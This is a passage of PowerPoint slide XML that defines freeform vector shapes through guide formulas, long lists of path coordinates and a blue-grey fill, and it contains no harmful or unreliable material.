                  <a:gd name="T84" fmla="*/ 101 w 151"/>
                  <a:gd name="T85" fmla="*/ 126 h 130"/>
                  <a:gd name="T86" fmla="*/ 95 w 151"/>
                  <a:gd name="T87" fmla="*/ 123 h 130"/>
                  <a:gd name="T88" fmla="*/ 88 w 151"/>
                  <a:gd name="T89" fmla="*/ 125 h 130"/>
                  <a:gd name="T90" fmla="*/ 83 w 151"/>
                  <a:gd name="T91" fmla="*/ 124 h 130"/>
                  <a:gd name="T92" fmla="*/ 76 w 151"/>
                  <a:gd name="T93" fmla="*/ 124 h 130"/>
                  <a:gd name="T94" fmla="*/ 71 w 151"/>
                  <a:gd name="T95" fmla="*/ 125 h 130"/>
                  <a:gd name="T96" fmla="*/ 64 w 151"/>
                  <a:gd name="T97" fmla="*/ 121 h 130"/>
                  <a:gd name="T98" fmla="*/ 56 w 151"/>
                  <a:gd name="T99" fmla="*/ 118 h 130"/>
                  <a:gd name="T100" fmla="*/ 44 w 151"/>
                  <a:gd name="T101" fmla="*/ 115 h 130"/>
                  <a:gd name="T102" fmla="*/ 29 w 151"/>
                  <a:gd name="T103" fmla="*/ 114 h 130"/>
                  <a:gd name="T104" fmla="*/ 17 w 151"/>
                  <a:gd name="T105" fmla="*/ 119 h 130"/>
                  <a:gd name="T106" fmla="*/ 7 w 151"/>
                  <a:gd name="T107" fmla="*/ 122 h 130"/>
                  <a:gd name="T108" fmla="*/ 8 w 151"/>
                  <a:gd name="T109" fmla="*/ 110 h 130"/>
                  <a:gd name="T110" fmla="*/ 1 w 151"/>
                  <a:gd name="T111" fmla="*/ 101 h 130"/>
                  <a:gd name="T112" fmla="*/ 12 w 151"/>
                  <a:gd name="T113" fmla="*/ 89 h 130"/>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51"/>
                  <a:gd name="T172" fmla="*/ 0 h 130"/>
                  <a:gd name="T173" fmla="*/ 151 w 151"/>
                  <a:gd name="T174" fmla="*/ 130 h 130"/>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51" h="130">
                    <a:moveTo>
                      <a:pt x="6" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="146" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="148" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="144" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="140" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="117" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="62"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36082" name="Freeform 215"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3107" y="1864"/>
                <a:ext cx="151" cy="130"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 11 w 151"/>
                  <a:gd name="T1" fmla="*/ 62 h 130"/>
                  <a:gd name="T2" fmla="*/ 19 w 151"/>
                  <a:gd name="T3" fmla="*/ 63 h 130"/>
                  <a:gd name="T4" fmla="*/ 26 w 151"/>
                  <a:gd name="T5" fmla="*/ 59 h 130"/>
                  <a:gd name="T6" fmla="*/ 31 w 151"/>
                  <a:gd name="T7" fmla="*/ 54 h 130"/>
                  <a:gd name="T8" fmla="*/ 36 w 151"/>
                  <a:gd name="T9" fmla="*/ 52 h 130"/>
                  <a:gd name="T10" fmla="*/ 41 w 151"/>
                  <a:gd name="T11" fmla="*/ 54 h 130"/>
                  <a:gd name="T12" fmla="*/ 38 w 151"/>
                  <a:gd name="T13" fmla="*/ 48 h 130"/>
                  <a:gd name="T14" fmla="*/ 40 w 151"/>
                  <a:gd name="T15" fmla="*/ 38 h 130"/>
                  <a:gd name="T16" fmla="*/ 47 w 151"/>
                  <a:gd name="T17" fmla="*/ 32 h 130"/>
                  <a:gd name="T18" fmla="*/ 52 w 151"/>
                  <a:gd name="T19" fmla="*/ 28 h 130"/>
                  <a:gd name="T20" fmla="*/ 56 w 151"/>
                  <a:gd name="T21" fmla="*/ 25 h 130"/>
                  <a:gd name="T22" fmla="*/ 52 w 151"/>
                  <a:gd name="T23" fmla="*/ 21 h 130"/>
                  <a:gd name="T24" fmla="*/ 55 w 151"/>
                  <a:gd name="T25" fmla="*/ 13 h 130"/>
                  <a:gd name="T26" fmla="*/ 60 w 151"/>
                  <a:gd name="T27" fmla="*/ 9 h 130"/>
                  <a:gd name="T28" fmla="*/ 70 w 151"/>
                  <a:gd name="T29" fmla="*/ 10 h 130"/>
                  <a:gd name="T30" fmla="*/ 74 w 151"/>
                  <a:gd name="T31" fmla="*/ 3 h 130"/>
                  <a:gd name="T32" fmla="*/ 81 w 151"/>
                  <a:gd name="T33" fmla="*/ 3 h 130"/>
                  <a:gd name="T34" fmla="*/ 88 w 151"/>
                  <a:gd name="T35" fmla="*/ 6 h 130"/>
                  <a:gd name="T36" fmla="*/ 98 w 151"/>
                  <a:gd name="T37" fmla="*/ 5 h 130"/>
                  <a:gd name="T38" fmla="*/ 98 w 151"/>
                  <a:gd name="T39" fmla="*/ 11 h 130"/>
                  <a:gd name="T40" fmla="*/ 105 w 151"/>
                  <a:gd name="T41" fmla="*/ 10 h 130"/>
                  <a:gd name="T42" fmla="*/ 111 w 151"/>
                  <a:gd name="T43" fmla="*/ 9 h 130"/>
                  <a:gd name="T44" fmla="*/ 120 w 151"/>
                  <a:gd name="T45" fmla="*/ 16 h 130"/>
                  <a:gd name="T46" fmla="*/ 122 w 151"/>
                  <a:gd name="T47" fmla="*/ 20 h 130"/>
                  <a:gd name="T48" fmla="*/ 123 w 151"/>
                  <a:gd name="T49" fmla="*/ 30 h 130"/>
                  <a:gd name="T50" fmla="*/ 121 w 151"/>
                  <a:gd name="T51" fmla="*/ 34 h 130"/>
                  <a:gd name="T52" fmla="*/ 124 w 151"/>
                  <a:gd name="T53" fmla="*/ 42 h 130"/>
                  <a:gd name="T54" fmla="*/ 125 w 151"/>
                  <a:gd name="T55" fmla="*/ 46 h 130"/>
                  <a:gd name="T56" fmla="*/ 134 w 151"/>
                  <a:gd name="T57" fmla="*/ 56 h 130"/>
                  <a:gd name="T58" fmla="*/ 136 w 151"/>
                  <a:gd name="T59" fmla="*/ 65 h 130"/>
                  <a:gd name="T60" fmla="*/ 147 w 151"/>
                  <a:gd name="T61" fmla="*/ 67 h 130"/>
                  <a:gd name="T62" fmla="*/ 149 w 151"/>
                  <a:gd name="T63" fmla="*/ 73 h 130"/>
                  <a:gd name="T64" fmla="*/ 147 w 151"/>
                  <a:gd name="T65" fmla="*/ 78 h 130"/>
                  <a:gd name="T66" fmla="*/ 135 w 151"/>
                  <a:gd name="T67" fmla="*/ 81 h 130"/>
                  <a:gd name="T68" fmla="*/ 128 w 151"/>
                  <a:gd name="T69" fmla="*/ 86 h 130"/>
                  <a:gd name="T70" fmla="*/ 132 w 151"/>
                  <a:gd name="T71" fmla="*/ 96 h 130"/>
                  <a:gd name="T72" fmla="*/ 133 w 151"/>
                  <a:gd name="T73" fmla="*/ 104 h 130"/>
                  <a:gd name="T74" fmla="*/ 132 w 151"/>
